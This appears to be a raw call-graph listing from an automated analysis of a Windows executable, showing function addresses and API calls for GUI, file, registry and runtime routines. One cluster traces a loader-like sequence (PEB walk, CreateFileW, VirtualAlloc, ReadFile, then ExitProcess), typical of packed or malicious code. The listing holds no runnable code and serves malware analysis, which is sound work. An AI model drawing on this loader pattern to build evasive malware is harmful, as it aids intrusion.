109153->109090 109154->108597 109155->108600 109156->108601 109157->108615 109158->108622 109159->108624 109160->108621 109161->108629 109162->108635 109163->108649 109164->108644 109166 1354aa5 GetFullPathNameW 109165->109166 109167 12e31c7 109165->109167 109169 1354abd 109166->109169 109222 12e3bcf 109167->109222 109170 12e31cd GetFullPathNameW 109171 12e31e7 109170->109171 109171->108451 109173 12e3a8b SHGetDesktopFolder 109172->109173 109174 12e3ade 109172->109174 109173->109174 109175 12e3a99 109173->109175 109174->108454 109175->109174 109176 12e3ac8 SHGetPathFromIDListW 109175->109176 109176->109174 109178 12e3ba9 109177->109178 109179 12e3b72 109177->109179 109178->109179 109181 1301bc7 _W_store_winword 59 API calls 109178->109181 109183 13533e5 109178->109183 109180 12e3bcf 48 API calls 109179->109180 109182 12e3b7d 109180->109182 109181->109178 109226 12e197e 109182->109226 109186 12e197e 48 API calls 109187 12e3b9f 109186->109187 109188 12e3dcb 109187->109188 109189 12e3f9b 136 API calls 109188->109189 109190 12e3def 109189->109190 109191 13539f9 109190->109191 109192 12e3f9b 136 API calls 109190->109192 109193 132cc82 122 API calls 109191->109193 109194 12e3e02 109192->109194 109195 1353a0e 109193->109195 109194->109191 109196 12e3e0a 109194->109196 109197 1353a12 109195->109197 109198 1353a2f 109195->109198 109200 12e3e16 109196->109200 109201 1353a1a 109196->109201 109202 12e3e39 84 API calls 109197->109202 109199 130010a 48 API calls 109198->109199 109221 1353a74 Mailbox 109199->109221 109232 12ebdf0 163 API calls 8 library calls 109200->109232 109233 132757b 87 API calls _wprintf 109201->109233 109202->109201 109205 1353a28 109205->109198 109206 12e3e2e 109206->108452 109207 1353c24 109208 13028ca _free 47 API calls 109207->109208 109209 1353c2c 109208->109209 109210 12e3e39 84 API calls 109209->109210 109215 1353c35 109210->109215 109214 13028ca _free 47 API calls 109214->109215 109215->109214 109216 12e3e39 84 API calls 109215->109216 109239 13232b0 86 API calls 4 library calls 109215->109239 109216->109215 109218 12ecaee 48 API calls 109218->109221 109221->109207 109221->109215 109221->109218 109234 13230ac 48 API calls _memmove 109221->109234 109235 1322fcd 60 API calls 2 library calls 109221->109235 109236 132a525 48 API calls 109221->109236 109237 12eb6d0 48 API calls _memmove 109221->109237 109238 12ea870 48 API calls 109221->109238 109223 12e3bd9 __wsetenvp 109222->109223 109224 130010a 48 API calls 109223->109224 109225 12e3bee _wcscpy 109224->109225 109225->109170 109227 12e1990 109226->109227 109231 12e19af _memmove 109226->109231 109229 130010a 48 API calls 109227->109229 109228 130010a 48 API calls 109230 12e19c6 109228->109230 109229->109231 109230->109186 109231->109228 109232->109206 109233->109205 109234->109221 109235->109221 109236->109221 109237->109221 109238->109221 109239->109215 109241 12ea72c 109240->109241 109242 12ea848 109240->109242 109241->109242 109243 130010a 48 API calls 109241->109243 109242->108460 109244 12ea753 109243->109244 109245 130010a 48 API calls 109244->109245 109246 12ea7c5 109245->109246 109246->109242 109253 12eace0 91 API calls 2 library calls 109246->109253 109254 12ea870 48 API calls 109246->109254 109255 132a3ee 48 API calls 109246->109255 109256 12eb6d0 48 API calls _memmove 109246->109256 109251->108463 109252->108465 109253->109246 109254->109246 109255->109246 109256->109246 109258 12e31a2 LoadImageW 109257->109258 109259 1354ad8 EnumResourceNamesW 109257->109259 109260 12e3118 RegisterClassExW 109258->109260 109259->109260 109261 12e2f58 7 API calls 109260->109261 109261->108479 109263 13544d1 109262->109263 109264 12e3618 109262->109264 109263->109264 109265 13544da DestroyIcon 109263->109265 109264->108485 109288 1326237 61 API calls _W_store_winword 109264->109288 109265->109264 109267 12e39d5 Mailbox 109266->109267 109268 12e3900 109266->109268 109267->108490 109289 12e7b6e 109268->109289 109271 12e391b 109273 12e7e53 48 API calls 109271->109273 109272 135453f LoadStringW 109274 1354559 109272->109274 109275 12e3930 109273->109275 109296 12e39e8 48 API calls 2 library calls 109274->109296 109275->109274 109276 12e3941 109275->109276 109278 12e39da 109276->109278 109279 12e394b 109276->109279 109295 12ec935 48 API calls 109278->109295 109294 12e39e8 48 API calls 2 library calls 109279->109294 109280 1354564 109283 1354578 109280->109283 109286 12e3956 _memset _wcscpy 109280->109286 109297 12e39e8 48 API calls 2 library calls 109283->109297 109285 1354586 109287 12e39ba Shell_NotifyIconW 109286->109287 109287->109267 109288->108485 109290 130010a 48 API calls 109289->109290 109291 12e7b93 109290->109291 109292 12ea6f8 48 API calls 109291->109292 109293 12e390e 109292->109293 109293->109271 109293->109272 109294->109286 109295->109286 109296->109280 109297->109285 109299 12eea20 109298->109299 109300 12efa40 346 API calls 109299->109300 109304 12eea89 109299->109304 109302 1359919 109300->109302 109301 13599bc 109425 132d520 86 API calls 4 library calls 109301->109425 109302->109304 109422 132d520 86 API calls 4 library calls 109302->109422 109308 12ed3d2 48 API calls 109304->109308 109332 12eeb18 109304->109332 109337 12eecd7 Mailbox 109304->109337 109305 12ed3d2 48 API calls 109307 1359997 109305->109307 109424 1301b2a 52 API calls __cinit 109307->109424 109310 1359963 109308->109310 109423 1301b2a 52 API calls __cinit 109310->109423 109311 1359d70 109434 133e2fb 346 API calls Mailbox 109311->109434 109313 12ed380 55 API calls 109313->109337 109315 1359ddf 109437 133c235 346 API calls Mailbox 109315->109437 109317 12efa40 346 API calls 109317->109337 109318 12e342c 48 API calls 109318->109337 109319 1359e49 109439 132d520 86 API calls 4 library calls 109319->109439 109320 1359dc2 109436 132d520 86 API calls 4 library calls 109320->109436 109321 12f14a0 48 API calls 109321->109337 109327 1359df7 109347 12eef0c Mailbox 109327->109347 109438 132d520 86 API calls 4 library calls 109327->109438 109329 12ef56f 109329->109347 109435 132d520 86 API calls 4 library calls 109329->109435 109332->109305 109332->109337 109333 132d520 86 API calls 109333->109337 109334 1359a3c 109428 133d154 48 API calls 109334->109428 109336 1359a48 109339 1359a9b 109336->109339 109340 1359a56 109336->109340 109337->109301 109337->109311 109337->109313 109337->109315 109337->109317 109337->109318 109337->109319 109337->109320 109337->109321 109337->109329 109337->109333 109337->109334 109337->109347 109421 12ed805 48 API calls _memmove 109337->109421 109426 132a3ee 48 API calls 109337->109426 109427 133ede9 346 API calls 109337->109427 109432 131a599 InterlockedDecrement 109337->109432 109433 133f4df 346 API calls 109337->109433 109344 1359a91 Mailbox 109339->109344 109430 132afce 48 API calls 109339->109430 109429 132a485 48 API calls 109340->109429 109341 12efa40 346 API calls 109341->109347 109344->109341 109345 1359ad8 109431 12fdf08 48 API calls 109345->109431 109347->108550 109349 12f469f 109348->109349 109350 12f4537 109348->109350 109351 12ecaee 48 API calls 109349->109351 109352 1357820 109350->109352 109353 12f4543 109350->109353 109360 12f45e4 Mailbox 109351->109360 109488 133e713 346 API calls Mailbox 109352->109488 109487 12f4040 346 API calls _memmove 109353->109487 109356 135782c 109357 12f4639 Mailbox 109356->109357 109489 132d520 86 API calls 4 library calls 109356->109489 109357->108550 109359 12f4559 109359->109356 109359->109357 109359->109360 109362 12e3e39 84 API calls 109360->109362 109440 13301e4 109360->109440 109481 12fdd84 109360->109481 109484 1340bfa 109360->109484 109362->109357 109365->108550 109366->108550 109367->108550 109368->108550 109369->108550 109370->108505 109371->108497 109372->108501 109373->108550 109374->108550 109375->108550 109376->108545 109377->108545 109378->108545 109380 12efa60 109379->109380 109416 12efa8e Mailbox _memmove 109379->109416 109381 130010a 48 API calls 109380->109381 109381->109416 109382 12f1063 109778 132d520 86 API calls 4 library calls 109382->109778 109383 12f105e 109774 12ec935 48 API calls 109383->109774 109385 12ed3d2 48 API calls 109385->109416 109387 12f0119 109779 132d520 86 API calls 4 library calls 109387->109779 109389 12ec935 48 API calls 109389->109416 109391 12f0dee 109768 12ed89e 50 API calls Mailbox 109391->109768 109392 1301b2a 52 API calls __cinit 109392->109416 109393 130010a 48 API calls 109393->109416 109394 135b772 109780 132d520 86 API calls 4 library calls 109394->109780 109395 12f0dfa 109769 12ed89e 50 API calls Mailbox 109395->109769 109400 12f0e83 109404 12ecaee 48 API calls 109400->109404 109402 135b7d2 109403 131a599 InterlockedDecrement 109403->109416 109412 12f10f1 Mailbox 109404->109412 109407 12f1230 109409 12efbf1 Mailbox 109407->109409 109777 132d520 86 API calls 4 library calls 109407->109777 109409->108550 109410 12efa40 346 API calls 109410->109416 109776 132d520 86 API calls 4 library calls 109412->109776 109414 135b583 109775 132d520 86 API calls 4 library calls 109414->109775 109416->109382 109416->109383 109416->109385 109416->109387 109416->109389 109416->109391 109416->109392 109416->109393 109416->109394 109416->109395 109416->109400 109416->109403 109416->109407 109416->109409 109416->109410 109416->109412 109416->109414 109417 1340bfa 129 API calls 109416->109417 109766 12ef6d0 346 API calls 2 library calls 109416->109766 109767 12f1620 59 API calls Mailbox 109416->109767 109770 133ee52 82 API calls 2 library calls 109416->109770 109771 133ef9d 90 API calls Mailbox 109416->109771 109772 132b020 48 API calls 109416->109772 109773 133e713 346 API calls Mailbox 109416->109773 109417->109416 109418->108545 109419->108545 109420->108545 109421->109337 109422->109304 109423->109332 109424->109337 109425->109347 109426->109337 109427->109337 109428->109336 109429->109344 109430->109345 109431->109344 109432->109337 109433->109337 109434->109329 109435->109347 109436->109347 109437->109327 109438->109347 109439->109347 109441 1330218 109440->109441 109442 133020d 109440->109442 109490 12e84a6 109441->109490 109574 12ecdb4 48 API calls 109442->109574 109445 1330232 109446 1330254 109445->109446 109447 133033c 109445->109447 109456 1330366 109445->109456 109448 12e84a6 81 API calls 109446->109448 109449 12e3f9b 136 API calls 109447->109449 109454 1330260 _wcscpy _wcschr 109448->109454 109450 133034d 109449->109450 109451 1330362 109450->109451 109452 12e3f9b 136 API calls 109450->109452 109453 12e84a6 81 API calls 109451->109453 109451->109456 109452->109451 109455 133039b 109453->109455 109460 1330284 _wcscat _wcscpy 109454->109460 109464 13302b2 _wcscat 109454->109464 109510 130297d 109455->109510 109456->109357 109458 12e84a6 81 API calls 109459 13302d0 _wcscpy 109458->109459 109575 1327c0c GetFileAttributesW 109459->109575 109462 12e84a6 81 API calls 109460->109462 109462->109464 109463 13302f0 __wsetenvp 109463->109456 109466 12e84a6 81 API calls 109463->109466 109464->109458 109465 13303bf _wcscat _wcscpy 109468 12e84a6 81 API calls 109465->109468 109467 133031c 109466->109467 109576 1326b3f 77 API calls 4 library calls 109467->109576 109470 1330456 109468->109470 109513 1327334 109470->109513 109471 1330330 109471->109456 109473 1330476 109474 12fdd84 3 API calls 109473->109474 109475 1330485 109474->109475 109476 12e84a6 81 API calls 109475->109476 109478 13304b6 109475->109478 109477 133049f 109476->109477 109519 132c890 109477->109519 109480 12e3e39 84 API calls 109478->109480 109480->109456 109675 12fdd92 GetFileAttributesW 109481->109675 109680 133f79f 109484->109680 109486 1340c0a 109486->109357 109487->109359 109488->109356 109489->109357 109491 12e84be 109490->109491 109508 12e84ba 109490->109508 109492 1355592 __i64tow 109491->109492 109493 1355494 109491->109493 109494 12e84d2 109491->109494 109504 12e84ea __itow Mailbox _wcscpy 109491->109504 109495 135557a 109493->109495 109499 135549d 109493->109499 109577 130234b 80 API calls 4 library calls 109494->109577 109578 130234b 80 API calls 4 library calls 109495->109578 109497 130010a 48 API calls 109500 12e84f4 109497->109500 109501 13554bc 109499->109501 109499->109504 109503 12ecaee 48 API calls 109500->109503 109500->109508 109502 130010a 48 API calls 109501->109502 109505 13554d9 109502->109505 109503->109508 109504->109497 109506 130010a 48 API calls 109505->109506 109507 13554ff 109506->109507 109507->109508 109509 12ecaee 48 API calls 109507->109509 109508->109445 109509->109508 109579 13029c7 109510->109579 109514 1327341 _wcschr __ftell_nolock 109513->109514 109515 130297d __wsplitpath 47 API calls 109514->109515 109518 1327357 _wcscat _wcscpy 109514->109518 109516 1327389 109515->109516 109517 130297d __wsplitpath 47 API calls 109516->109517 109517->109518 109518->109473 109520 132c89d __ftell_nolock 109519->109520 109521 130010a 48 API calls 109520->109521 109522 132c8fa 109521->109522 109523 12e4bce 48 API calls 109522->109523 109524 132c904 109523->109524 109525 132c6a0 GetSystemTimeAsFileTime 109524->109525 109526 132c90f 109525->109526 109527 12e41a7 83 API calls 109526->109527 109528 132c922 _wcscmp 109527->109528 109529 132c9f3 109528->109529 109530 132c946 109528->109530 109531 132ce59 94 API calls 109529->109531 109532 132ce59 94 API calls 109530->109532 109547 132c9bf _wcscat 109531->109547 109533 132c94b 109532->109533 109534 130297d __wsplitpath 47 API calls 109533->109534 109536 132c9fc 109533->109536 109539 132c974 _wcscat _wcscpy 109534->109539 109535 12e417d 64 API calls 109537 132ca18 109535->109537 109536->109478 109538 12e417d 64 API calls 109537->109538 109540 132ca28 109538->109540 109542 130297d __wsplitpath 47 API calls 109539->109542 109541 12e417d 64 API calls 109540->109541 109543 132ca43 109541->109543 109542->109547 109544 12e417d 64 API calls 109543->109544 109545 132ca53 109544->109545 109546 12e417d 64 API calls 109545->109546 109548 132ca6e 109546->109548 109547->109535 109547->109536 109549 12e417d 64 API calls 109548->109549 109550 132ca7e 109549->109550 109551 12e417d 64 API calls 109550->109551 109552 132ca8e 109551->109552 109553 12e417d 64 API calls 109552->109553 109554 132ca9e 109553->109554 109605 132d009 GetTempPathW GetTempFileNameW 109554->109605 109556 132caaa 109557 1304129 117 API calls 109556->109557 109568 132cabb 109557->109568 109558 132cb75 109559 1304274 __fcloseall 83 API calls 109558->109559 109560 132cb80 109559->109560 109562 132cb86 DeleteFileW 109560->109562 109563 132cb9a 109560->109563 109561 12e417d 64 API calls 109561->109568 109562->109536 109564 132cc2e CopyFileW 109563->109564 109569 132cba4 109563->109569 109565 132cc56 DeleteFileW 109564->109565 109566 132cc44 DeleteFileW 109564->109566 109619 132cfc8 CreateFileW 109565->109619 109566->109536 109568->109536 109568->109558 109568->109561 109606 130373e 109568->109606 109571 132c251 118 API calls 109569->109571 109572 132cc19 109571->109572 109572->109565 109573 132cc1d DeleteFileW 109572->109573 109573->109536 109574->109441 109575->109463 109576->109471 109577->109504 109578->109504 109580 13029e2 109579->109580 109583 13029d6 109579->109583 109603 130889e 47 API calls __getptd_noexit 109580->109603 109582 1302b9a 109587 13029c2 109582->109587 109604 1307aa0 8 API calls __controlfp_s 109582->109604 109583->109580 109591 1302a55 109583->109591 109598 130a9fb 47 API calls 2 library calls 109583->109598 109586 1302b21 109586->109580 109586->109587 109589 1302b31 109586->109589 109587->109465 109588 1302ae0 109588->109580 109590 1302afc 109588->109590 109600 130a9fb 47 API calls 2 library calls 109588->109600 109602 130a9fb 47 API calls 2 library calls 109589->109602 109590->109580 109590->109587 109594 1302b12 109590->109594 109591->109580 109597 1302ac2 109591->109597 109599 130a9fb 47 API calls 2 library calls 109591->109599 109601 130a9fb 47 API calls 2 library calls 109594->109601 109597->109586 109597->109588 109598->109591 109599->109597 109600->109590 109601->109587 109602->109587 109603->109582 109604->109587 109605->109556 109607 130374a _raise 109606->109607 109608 1303774 _raise 109607->109608 109609 1303764 109607->109609 109610 130377c 109607->109610 109608->109568 109634 130889e 47 API calls __getptd_noexit 109609->109634 109612 1305a9f __lock_file 48 API calls 109610->109612 109614 1303782 109612->109614 109613 1303769 109635 1307aa0 8 API calls __controlfp_s 109613->109635 109622 13035e7 109614->109622 109620 132d004 109619->109620 109621 132cfee SetFileTime CloseHandle 109619->109621 109620->109536 109621->109620 109625 13035f6 109622->109625 109628 1303614 109622->109628 109623 1303604 109658 130889e 47 API calls __getptd_noexit 109623->109658 109625->109623 109625->109628 109632 130362c _memmove 109625->109632 109626 1303609 109659 1307aa0 8 API calls __controlfp_s 109626->109659 109636 13037b4 LeaveCriticalSection LeaveCriticalSection _fseek 109628->109636 109630 1303914 __flush 78 API calls 109630->109632 109631 13035c3 __fputwc_nolock 47 API calls 109631->109632 109632->109628 109632->109630 109632->109631 109633 130bd14 __flswbuf 78 API calls 109632->109633 109637 1309af3 109632->109637 109633->109632 109634->109613 109635->109608 109636->109608 109638 13035c3 __fputwc_nolock 47 API calls 109637->109638 109639 1309b01 109638->109639 109640 1309b23 109639->109640 109641 1309b0c 109639->109641 109643 1309b28 109640->109643 109648 1309b35 __flswbuf 109640->109648 109663 130889e 47 API calls __getptd_noexit 109641->109663 109664 130889e 47 API calls __getptd_noexit 109643->109664 109644 1309b11 109644->109632 109646 1309c13 109651 130bd14 __flswbuf 78 API calls 109646->109651 109647 1309b99 109649 1309bb3 109647->109649 109650 1309bca 109647->109650 109648->109644 109654 1309b84 109648->109654 109657 1309b8f 109648->109657 109665 13149a2 109648->109665 109652 130bd14 __flswbuf 78 API calls 109649->109652 109650->109644 109674 13104e3 52 API calls 7 library calls 109650->109674 109651->109644 109652->109644 109654->109657 109660 1314bd4 109654->109660 109657->109646 109657->109647 109658->109626 109659->109628 109661 1307660 __malloc_crt 47 API calls 109660->109661 109662 1314be9 109661->109662 109662->109657 109663->109644 109664->109644 109666 13149ba 109665->109666 109667 13149ad 109665->109667 109669 13149c6 109666->109669 109670 130889e __calloc_impl 47 API calls 109666->109670 109668 130889e __calloc_impl 47 API calls 109667->109668 109671 13149b2 109668->109671 109669->109654 109672 13149e7 109670->109672 109671->109654 109673 1307aa0 __controlfp_s 8 API calls 109672->109673 109673->109671 109674->109644 109676 1354a7d FindFirstFileW 109675->109676 109677 12fdd89 109675->109677 109678 1354a95 FindClose 109676->109678 109679 1354a8e 109676->109679 109677->109357 109679->109678 109681 12e84a6 81 API calls 109680->109681 109682 133f7db 109681->109682 109687 133f81d Mailbox 109682->109687 109716 1340458 109682->109716 109684 133fa7c 109685 133fbeb 109684->109685 109690 133fa86 109684->109690 109752 1340579 89 API calls Mailbox 109685->109752 109687->109486 109689 133fbf8 109689->109690 109692 133fc04 109689->109692 109729 133f5fb 109690->109729 109691 12e84a6 81 API calls 109706 133f875 Mailbox 109691->109706 109692->109687 109697 133faba 109743 12ff92c 109697->109743 109700 133fad4 109749 132d520 86 API calls 4 library calls 109700->109749 109701 133faee 109703 12e3320 48 API calls 109701->109703 109705 133fb05 109703->109705 109704 133fadf GetCurrentProcess TerminateProcess 109704->109701 109707 12f14a0 48 API calls 109705->109707 109715 133fb2f 109705->109715 109706->109684 109706->109687 109706->109691 109747 13428d9 48 API calls _memmove 109706->109747 109748 133fc96 60 API calls 2 library calls 109706->109748 109709 133fb1e 109707->109709 109708 133fc56 109708->109687 109712 133fc6f FreeLibrary 109708->109712 109750 1340300 105 API calls _free 109709->109750 109711 12f14a0 48 API calls 109711->109715 109712->109687 109715->109708 109715->109711 109751 12ed89e 50 API calls Mailbox 109715->109751 109753 1340300 105 API calls _free 109715->109753 109717 12eb8a7 48 API calls 109716->109717 109718 1340473 CharLowerBuffW 109717->109718 109754 133267a 109718->109754 109722 12ed3d2 48 API calls 109723 13404ac 109722->109723 109761 12e7f40 48 API calls _memmove 109723->109761 109725 13404c3 109726 12ea2fb 48 API calls 109725->109726 109728 13404cf Mailbox 109726->109728 109727 134050b Mailbox 109727->109706 109728->109727 109762 133fc96 60 API calls 2 library calls 109728->109762 109730 133f616 109729->109730 109734 133f66b 109729->109734 109731 130010a 48 API calls 109730->109731 109732 133f638 109731->109732 109733 130010a 48 API calls 109732->109733 109732->109734 109733->109732 109735 1340719 109734->109735 109736 1340944 Mailbox 109735->109736 109742 134073c _strcat _wcscpy __wsetenvp 109735->109742 109736->109697 109737 12ecdb4 48 API calls 109737->109742 109738 12ed00b 58 API calls 109738->109742 109739 12e84a6 81 API calls 109739->109742 109740 13045ec 47 API calls std::exception::_Copy_str 109740->109742 109742->109736 109742->109737 109742->109738 109742->109739 109742->109740 109765 1328932 50 API calls __wsetenvp 109742->109765 109744 12ff941 109743->109744 109745 12ff9d9 VirtualAlloc 109744->109745 109746 12ff9a7 109744->109746 109745->109746 109746->109700 109746->109701 109747->109706 109748->109706 109749->109704 109750->109715 109751->109715 109752->109689 109753->109715 109755 13326a4 __wsetenvp 109754->109755 109756 13326e2 109755->109756 109758 13326d8 109755->109758 109759 1332763 109755->109759 109756->109722 109756->109728 109758->109756 109763 12fdfd2 60 API calls 109758->109763 109759->109756 109764 12fdfd2 60 API calls 109759->109764 109761->109725 109762->109727 109763->109758 109764->109759 109765->109742 109766->109416 109767->109416 109768->109395 109769->109400 109770->109416 109771->109416 109772->109416 109773->109416 109774->109409 109775->109412 109776->109409 109777->109382 109778->109387 109779->109394 109780->109402 109781 135a0a7 109785 132af66 109781->109785 109783 135a0b2 109784 132af66 84 API calls 109783->109784 109784->109783 109786 132afa0 109785->109786 109791 132af73 109785->109791 109786->109783 109787 132afa2 109806 12ff833 81 API calls 109787->109806 109789 132afa7 109790 12e84a6 81 API calls 109789->109790 109792 132afae 109790->109792 109791->109786 109791->109787 109791->109789 109794 132af9a 109791->109794 109796 12e7b4b 109792->109796 109805 12f4265 61 API calls _memmove 109794->109805 109797 12e7b5d 109796->109797 109798 135240d 109796->109798 109807 12ebbd9 109797->109807 109813 131c0a2 48 API calls _memmove 109798->109813 109801 12e7b69 109801->109786 109802 1352417 109814 12ec935 48 API calls 109802->109814 109804 135241f Mailbox 109805->109786 109806->109789 109808 12ebbe7 109807->109808 109809 12ebc0d _memmove 109807->109809 109808->109809 109810 130010a 48 API calls 109808->109810 109809->109801 109811 12ebc5c 109810->109811 109812 130010a 48 API calls 109811->109812 109812->109809 109813->109802 109814->109804 109815 2623b0 109829 260000 109815->109829 109817 262473 109832 2622a0 109817->109832 109819 26249c CreateFileW 109821 2624f0 109819->109821 109822 2624eb 109819->109822 109821->109822 109823 262507 VirtualAlloc 109821->109823 109823->109822 109824 262525 ReadFile 109823->109824 109824->109822 109825 262540 109824->109825 109826 2612a0 12 API calls 109825->109826 109827 262573 109826->109827 109828 262596 ExitProcess 109827->109828 109828->109822 109835 2634a0 GetPEB 109829->109835 109831 26068b 109831->109817 109833 2622a9 Sleep 109832->109833 109834 2622b7 109833->109834 109836 2634ca 109835->109836 109836->109831 109837 1351eed 109842 12fe975 109837->109842 109839 1351f01 109858 1301b2a 52 API calls __cinit 109839->109858 109841 1351f0b 109843 130010a 48 API calls 109842->109843 109844 12fea27 GetModuleFileNameW 109843->109844 109845 130297d __wsplitpath 47 API calls 109844->109845 109846 12fea5b _wcsncat 109845->109846 109859 1302bff 109846->109859 109849 130010a 48 API calls 109850 12fea94 _wcscpy 109849->109850 109851 12ed3d2 48 API calls 109850->109851 109852 12feacf 109851->109852 109862 12feb05 109852->109862 109854 12feae0 Mailbox 109854->109839 109855 12ea4f6 48 API calls 109857 12feada _wcscat __wsetenvp _wcsncpy 109855->109857 109856 130010a 48 API calls 109856->109857 109857->109854 109857->109855 109857->109856 109858->109841 109876 130aab9 109859->109876 109888 12ec4cd 109862->109888 109864 12feb14 RegOpenKeyExW 109865 1354b17 RegQueryValueExW 109864->109865 109866 12feb35 109864->109866 109867 1354b91 RegCloseKey 109865->109867 109868 1354b30 109865->109868 109866->109857 109869 130010a 48 API calls 109868->109869 109870 1354b49 109869->109870 109871 12e4bce 48 API calls 109870->109871 109872 1354b53 RegQueryValueExW 109871->109872 109873 1354b6f 109872->109873 109874 1354b86 109872->109874 109875 12e7e53 48 API calls 109873->109875 109874->109867 109875->109874 109877 130abc6 109876->109877 109878 130aaca 109876->109878 109886 130889e 47 API calls __getptd_noexit 109877->109886 109878->109877 109884 130aad5 109878->109884 109880 130abbb 109887 1307aa0 8 API calls __controlfp_s 109880->109887 109882 12fea8a 109882->109849 109884->109882 109885 130889e 47 API calls __getptd_noexit 109884->109885 109885->109880 109886->109880 109887->109882 109889 12ec4da 109888->109889 109890 12ec4e7 109888->109890 109889->109864 109891 130010a 48 API calls 109890->109891 109891->109889 109892 12e29c2 109893 12e29cb 109892->109893 109894 12e2a48 109893->109894 109895 12e29e9 109893->109895 109932 12e2a46 109893->109932 109899 12e2a4e 109894->109899 109900 1352307 109894->109900 109896 12e2aac PostQuitMessage 109895->109896 109897 12e29f6 109895->109897 109904 12e2a39 109896->109904 109902 135238f 109897->109902 109903 12e2a01 109897->109903 109898 12e2a2b DefWindowProcW 109898->109904 109905 12e2a76 SetTimer RegisterWindowMessageW 109899->109905 109906 12e2a53 109899->109906 109941 12e322e 16 API calls 109900->109941 109946 13257fb 60 API calls _memset 109902->109946 109908 12e2a09 109903->109908 109909 12e2ab6 109903->109909 109905->109904 109910 12e2a9f CreatePopupMenu 109905->109910 109912 12e2a5a KillTimer 109906->109912 109913 13522aa 109906->109913 109907 135232e 109942 12fec33 346 API calls Mailbox 109907->109942 109916 1352374 109908->109916 109917 12e2a14 109908->109917 109939 12e1e58 53 API calls _memset 109909->109939 109910->109904 109937 12e2b94 Shell_NotifyIconW _memset 109912->109937 109920 13522e3 MoveWindow 109913->109920 109921 13522af 109913->109921 109916->109898 109945 131b31f 48 API calls 109916->109945 109923 12e2a1f 109917->109923 109924 135235f 109917->109924 109918 13523a1 109918->109898 109918->109904 109920->109904 109926 13522b3 109921->109926 109927 13522d2 SetFocus 109921->109927 109922 12e2a6d 109938 12e2ac7 DeleteObject DestroyWindow Mailbox 109922->109938 109923->109898 109943 12e2b94 Shell_NotifyIconW _memset 109923->109943 109944 1325fdb 70 API calls _memset 109924->109944 109925 12e2ac5 109925->109904 109926->109923 109930 13522bc 109926->109930 109927->109904 109940 12e322e 16 API calls 109930->109940 109932->109898 109935 1352353 109936 12e3598 67 API calls 109935->109936 109936->109932 109937->109922 109938->109904 109939->109925 109940->109904 109941->109907 109942->109923 109943->109935 109944->109925 109945->109932 109946->109918 109947 13137dc 109948 1313811 109947->109948 109951 13137ec 109947->109951 109950 131381c 109952 1308e19 SetUnhandledExceptionFilter 109950->109952 109951->109948 109954 13091d0 109951->109954 109953 1313827 109952->109953 109955 13091dc _raise 109954->109955 109960 130869d 47 API calls 2 library calls 109955->109960 109959 13091e1 109961 13148bb 48 API calls 3 library calls 109959->109961 109960->109959 109962 1351e8b 109967 12fe44f 109962->109967 109966 1351e9a 109968 130010a 48 API calls 109967->109968 109969 12fe457 109968->109969 109970 12fe46b 109969->109970 109975 12fe74b 109969->109975 109974 1301b2a 52 API calls __cinit 109970->109974 109974->109966 109976 12fe463 109975->109976 109977 12fe754 109975->109977 109979 12fe47b 109976->109979 110007 1301b2a 52 API calls __cinit 109977->110007 109980 12ed3d2 48 API calls 109979->109980 109981 12fe492 GetVersionExW 109980->109981 109982 12e7e53 48 API calls 109981->109982 109983 12fe4d5 109982->109983 110008 12fe5f8 109983->110008 109989 13529f9 109991 12fe55f GetCurrentProcess 110025 12fe70e LoadLibraryA GetProcAddress 109991->110025 109992 12fe576 109994 12fe59e 109992->109994 109995 12fe5ec GetSystemInfo 109992->109995 110019 12fe694 109994->110019 109996 12fe5c9 109995->109996 109998 12fe5dc 109996->109998 109999 12fe5d7 FreeLibrary 109996->109999 109998->109970 109999->109998 110001 12fe5e4 GetSystemInfo 110003 12fe5be 110001->110003 110002 12fe5b4 110022 12fe437 110002->110022 110003->109996 110005 12fe5c4 FreeLibrary 110003->110005 110005->109996 110007->109976 110009 12fe601 110008->110009 110010 12ea2fb 48 API calls 110009->110010 110011 12fe4dd 110010->110011 110012 12fe617 110011->110012 110013 12fe625 110012->110013 110014 12ea2fb 48 API calls 110013->110014 110015 12fe4e9 110014->110015 110015->109989 110016 12fe6d1 110015->110016 110026 12fe6e3 110016->110026 110030 12fe6a6 110019->110030 110023 12fe694 2 API calls 110022->110023 110024 12fe43f GetNativeSystemInfo 110023->110024 110024->110003 110025->109992 110027 12fe55b 110026->110027 110028 12fe6ec LoadLibraryA 110026->110028 110027->109991 110027->109992 110028->110027 110029 12fe6fd GetProcAddress 110028->110029 110029->110027 110031 12fe5ac 110030->110031 110032 12fe6af LoadLibraryA 110030->110032 110031->110001 110031->110002 110032->110031 110033 12fe6c0 GetProcAddress 110032->110033 110033->110031 110034 1351edb 110039 12e131c 110034->110039 110036 1351ee1 110072 1301b2a 52 API calls __cinit 110036->110072 110038 1351eeb 110040 12e133e 110039->110040 110073 12e1624 110040->110073 110045 12ed3d2 48 API calls 110046 12e137e 110045->110046 110047 12ed3d2 48 API calls 110046->110047 110048 12e1388 110047->110048 110049 12ed3d2 48 API calls 110048->110049 110050 12e1392 110049->110050 110051 12ed3d2 48 API calls 110050->110051 110052 12e13d8 110051->110052 110053 12ed3d2 48 API calls 110052->110053 110054 12e14bb 110053->110054 110081 12e1673 110054->110081 110058 12e14eb 110059 12ed3d2 48 API calls 110058->110059 110060 12e14f5 110059->110060 110110 12e175e 110060->110110 110062 12e1540 110063 12e1550 GetStdHandle 110062->110063 110064 12e15ab 110063->110064 110065 13558da 110063->110065 110066 12e15b1 CoInitialize 110064->110066 110065->110064 110067 13558e3 110065->110067 110066->110036 110117 1329bd1 53 API calls 110067->110117 110069 13558ea 110118 132a2f6 CreateThread 110069->110118 110071 13558f6 CloseHandle 110071->110066 110072->110038 110119 12e17e0 110073->110119 110076 12e7e53 48 API calls 110077 12e1344 110076->110077 110078 12e16db 110077->110078 110133 12e1867 6 API calls 110078->110133 110080 12e1374 110080->110045 110082 12ed3d2 48 API calls 110081->110082 110083 12e1683 110082->110083 110084 12ed3d2 48 API calls 110083->110084 110085 12e168b 110084->110085 110134 12e7d70 110085->110134 110088 12e7d70 48 API calls 110089 12e169b 110088->110089 110090 12ed3d2 48 API calls 110089->110090 110091 12e16a6 110090->110091 110092 130010a 48 API calls 110091->110092 110093 12e14c5 110092->110093 110094 12e16f2 110093->110094 110095 12e1700 110094->110095 110096 12ed3d2 48 API calls 110095->110096 110097 12e170b 110096->110097 110098 12ed3d2 48 API calls 110097->110098 110099 12e1716 110098->110099 110100 12ed3d2 48 API calls 110099->110100 110101 12e1721 110100->110101 110102 12ed3d2 48 API calls 110101->110102 110103 12e172c 110102->110103 110104 12e7d70 48 API calls 110103->110104 110105 12e1737 110104->110105 110106 130010a 48 API calls 110105->110106 110107 12e173e 110106->110107 110108 13524a6 110107->110108 110109 